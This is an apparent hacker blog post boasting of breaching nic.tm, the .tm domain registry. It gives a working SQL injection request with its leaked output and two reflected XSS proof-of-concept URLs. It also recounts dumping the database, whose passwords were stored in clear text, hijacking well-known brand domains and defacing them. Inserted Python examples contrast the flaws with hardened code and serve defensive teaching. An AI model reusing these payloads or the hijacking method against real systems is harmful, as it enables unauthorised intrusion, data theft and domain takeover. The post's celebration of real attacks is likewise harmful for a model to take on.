In an independent project we decided to penetrate some important sites, and today we want to share a small part of what we have done. Today we proudly announce nic.tm here: it hosts a vulnerable application that is prone to a MySQL injection bug. It was a big lead for us, as it gave us the credentials of all the sites. In the rest of this update we describe the vulnerability affecting the site.
If you glance at the picture below:
it can be seen that the hidden form parameters might not be checked. That was the hole we focused on:
POST /cgi-bin/mail_my_domains HTTP/1.1
Host: nic.tm
Content-Type: application/x-www-form-urlencoded
Content-Length: 142
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Connection: Close

Addr=1029999%27+union+all+select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28system_user%28%29+as+char%29%29%29%2C0x27%2C0x7e%29--+a&OrderBy=1
And we received:
.................. .................. ..................The database search found 0 ~'drs@localhost'~ domains
Oops: we saw the data leak from Nic.tm's database; drs@localhost is the current database user. For data gathering, we automated the attack and dumped the whole database. Another notable finding was the passwords: they had been stored in clear text, which is an unacceptable issue for the NIC of a country. All dumped data are accessible via this link. We also found some important domains among the dumped data (listed below), which we were able to hijack easily:
www.youtube.tm
www.gmail.tm
www.msdn.tm
www.intel.tm
www.officexp.tm
www.xbox.tm
www.windowsvista.tm
www.orkut.tm
www.google.tm (?)
www.yahoo.tm
www.cisco.tm
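The two defects described above (the Addr value being pasted into the SQL text, and passwords kept in clear text) are easiest to see next to their fixed forms. The following is an added example written for this page, not code from nic.tm or from the authors of the post; the table layout, the sample rows, and the probe input are constructed, and the real application's schema and language are not known.

```python
import hashlib
import hmac
import os
import sqlite3

# Constructed sample rows standing in for a registrar's domain table.
# The real schema of nic.tm is not known; nothing here is that site's code.
SAMPLE_ROWS = [
    ("example.tm", "alice@example.tm", "hunter2"),
    ("sample.tm", "bob@sample.tm", "letmein"),
]


def make_db():
    """Build an in-memory SQLite database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE domains (name TEXT, handler_email TEXT, password TEXT)")
    conn.executemany("INSERT INTO domains VALUES (?, ?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def search_vulnerable(conn, addr):
    """The pattern the post describes: the Addr form value is pasted into the SQL
    text, so quotes and comment markers in the value change the query itself."""
    sql = "SELECT name FROM domains WHERE handler_email = '" + addr + "'"
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn, addr):
    """Hardened form: the value is bound as a parameter, so the engine always
    treats it as a string literal, whatever characters it contains."""
    sql = "SELECT name FROM domains WHERE handler_email = ?"
    return [row[0] for row in conn.execute(sql, (addr,))]


PBKDF2_ROUNDS = 200_000


def hash_password(password, salt=None):
    """Store a salted PBKDF2-HMAC-SHA256 digest instead of the clear-text
    password, so a dumped table does not hand out working credentials."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)
    return salt.hex() + "$" + digest.hex()


def verify_password(stored, candidate):
    """Recompute the digest with the stored salt and compare in constant time."""
    salt_hex, digest_hex = stored.split("$", 1)
    digest = hashlib.pbkdf2_hmac("sha256", candidate.encode("utf-8"),
                                 bytes.fromhex(salt_hex), PBKDF2_ROUNDS)
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    db = make_db()
    probe = "' OR 1=1 --"  # constructed input that breaks out of the quoted literal
    print("vulnerable:", search_vulnerable(db, probe))  # every row comes back
    print("safe:      ", search_safe(db, probe))        # nothing matches the literal
    record = hash_password("hunter2")
    print("stored:    ", record)
    print("verify:    ", verify_password(record, "hunter2"))
```

With the constructed probe, `search_vulnerable` returns every row because the quote closes the literal and `--` comments out the rest of the statement, while `search_safe` returns nothing because the whole string is compared as a value. The password helpers show the second point from the post: had the dumped table held salted PBKDF2 digests rather than clear text, the dump alone would not have yielded usable credentials for the domain panel.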
This was not the end of the story; we realized that the application suffers from reflected cross-site scripting too. The affected parameters were Addr and OrderBy. PoCs:
/cgi-bin/mail_my_domains?Addr=1%27+union+all+select+1%E2%80%9C+a&OrderBy=1847ae%27%3E%3Cscript%3Ealert%281%29%3C/script%3E
/cgi-bin/mail_my_domains?Addr=1%27+union+all+select+1--+ad4a26%3E%3Cscript%3Ealert%281%29%3C/script%3E&OrderBy=1
Both work in Firefox. Finally, here is the panel of Gmail.tm after authentication:
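The reflected XSS above exists because both parameters are echoed back into the results page unchanged. The following is an added example for this page, not the nic.tm application's code: it shows that reflection pattern beside a hardened handler that resolves OrderBy against an allowlist instead of echoing it, HTML-escapes Addr before it enters the page, and sends headers that keep the escaping effective. The column mapping for OrderBy is an assumption made for the example; the probe string is the decoded value from the second PoC above.

```python
import html

# Assumed mapping from the numeric OrderBy value to a real column; constructed
# for this example, not taken from the nic.tm application.
ALLOWED_ORDER = {"1": "name", "2": "handler_email"}

# Decoded form of the PoC value from the post, used here only as a test input.
XSS_PROBE = "1847ae'><script>alert(1)</script>"


def render_vulnerable(addr, order_by):
    """Pattern the post describes: both parameters are reflected into the page
    untouched, so markup in either one becomes part of the HTML."""
    return ("<p>The database search found 0 domains for " + addr
            + " (order " + order_by + ")</p>")


def render_safe(addr, order_by):
    """Hardened form: OrderBy is resolved against an allowlist and never echoed,
    and Addr is HTML-escaped (quotes included) before it enters the page."""
    column = ALLOWED_ORDER.get(order_by)
    if column is None:
        return "<p>Invalid OrderBy parameter.</p>"
    return ("<p>The database search found 0 domains for "
            + html.escape(addr, quote=True) + " (sorted by " + column + ")</p>")


def build_response(body):
    """Response headers that make the escaping effective: an explicit charset so
    the browser cannot guess a different encoding, and no MIME sniffing."""
    headers = {
        "Content-Type": "text/html; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
    }
    return headers, body


def contains_raw_tag(page):
    """Output check: True if an unescaped <script> tag survived into the page."""
    return "<script" in page.lower()


if __name__ == "__main__":
    print(render_vulnerable(XSS_PROBE, "1"))       # probe lands in the page as markup
    print(render_safe(XSS_PROBE, "1"))             # probe appears as escaped text
    print(render_safe("alice@example.tm", XSS_PROBE))  # unknown OrderBy is rejected
```

In the safe version the single quote, `<` and `>` of the probe become `&#x27;`, `&lt;` and `&gt;`, so the browser renders them as text rather than as a tag; OrderBy never reaches the page at all, which also removes it as an injection point for the query.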
We can also point to another security imperfection in the panel: if you want to change the DNS of a domain, a confirmation e-mail is sent to the handler's e-mail address, which can be changed to the attacker's address. The following domains were defaced as a PoC:
http://zone-h.org/mirror/id/19125537
http://zone-h.org/mirror/id/19125766
http://append-hc.com/mirror/id/66204
http://zone-h.org/mirror/id/19126130
http://zone-h.org/mirror/id/19126154
http://zone-h.org/mirror/id/19125901
Happy hacking, and be safe.